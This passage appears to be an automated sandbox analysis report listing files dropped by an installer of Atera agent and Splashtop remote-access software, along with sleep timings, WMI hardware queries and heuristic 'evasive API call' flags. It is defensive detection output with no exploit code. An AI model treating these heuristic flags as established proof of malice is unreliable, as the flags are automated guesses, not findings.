                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.HttpUtility.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x86\SRWacomUtil32.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x86\SRUsb.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF4AD.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\fips.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxyumd.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\CredProvider\x86\SRCredentialProvider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Cng.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\WdfCoInstaller01009.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.Lightweight.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x64\SRWacomCtrl64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC672.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_iddcx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.HttpListener.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\PkgHelper.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.dllJump to dropped file
Source: C:\Windows\Temp\SplashtopStreamer.exe | Evasive API call chain: GetLocalTime, DecisionNodes
Source: C:\Windows\Temp\SplashtopStreamer.exe | Evasive API call chain: GetModuleFileName, DecisionNodes, Sleep
Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe | Evasive API call chain: GetModuleFileName, DecisionNodes, Sleep
Source: C:\Windows\Temp\SplashtopStreamer.exe | Evasive API call chain: GetModuleFileName, DecisionNodes, ExitProcess
Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe | Evasive API call chain: GetModuleFileName, DecisionNodes, ExitProcess
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597812s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597702s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597593s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597483s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597347s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597218s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597109s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596987s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596859s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596745s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596422s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596047s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595655s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595546s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595437s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595215s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595030s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594921s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594810s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594687s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594577s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594356s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594249s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594138s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594031s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593921s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593806s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593703s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593593s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593249s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593138s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593031s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592921s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592811s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592702s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592593s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592484s >= -30000s
                                Source: C:\Windows\Temp\SplashtopStreamer.exe TID: 7388Thread sleep time: -33000s >= -30000s
                                Source: C:\Windows\SysWOW64\msiexec.exe TID: 7536Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00406657 __EH_prolog3_GS,GetFullPathNameW,_DebugHeapAllocator,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,_DebugHeapAllocator,36_2_00406657
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00428B20 _DebugHeapAllocator,_DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,_DebugHeapAllocator,_DebugHeapAllocator,_DebugHeapAllocator,FindNextFileW,FindClose,_DebugHeapAllocator,36_2_00428B20
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BBB1E5 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,37_2_00BBB1E5
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599656
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599433
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599109
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598781
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598562
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598453
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598344
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598234
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598125
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598016
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597906
